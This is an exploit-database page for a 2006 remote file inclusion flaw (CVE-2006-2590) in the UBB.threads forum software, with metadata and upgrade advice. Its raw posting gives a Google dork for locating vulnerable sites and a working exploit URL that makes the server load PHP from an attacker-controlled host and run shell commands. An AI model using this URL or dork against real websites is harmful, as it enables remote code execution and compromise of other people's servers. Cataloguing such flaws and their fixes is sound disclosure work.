header-logo
Suggest Exploit
vendor:
UBB.threads
by:
V4mu
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: UBB.threads
Affected Version From: 6.4.x
Affected Version To: 6.4.1
Patch Exists: YES
Related CWE: CVE-2006-2590
CPE: a:ubbcentral:ubb.threads
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2006

UBB.threads >= 6.4.x Remote File Inclusion

UBB.threads is prone to a remote file inclusion vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code in the context of the webserver process.

Mitigation:

Upgrade to UBB.threads version 6.4.2 or later.
Source

Exploit-DB raw data:

Anomaly 1n The System presents
UBB.threads >= 6.4.x Remote File Inclusion
 
founded by V4mu in 04/20/2006

URL: http://www.ubbcentral.com
Google dork: allinurl:"/ubbthreads/"

exploit:
/addpost_newpoll.php?addpoll=preview&thispath=http://[attacker]/cmd.gif?&cmd=id
 
contact: irc.gigachat.net #A1TS

# milw0rm.com [2006-05-22]

Navigation

Suggest Exploit

Services By CQR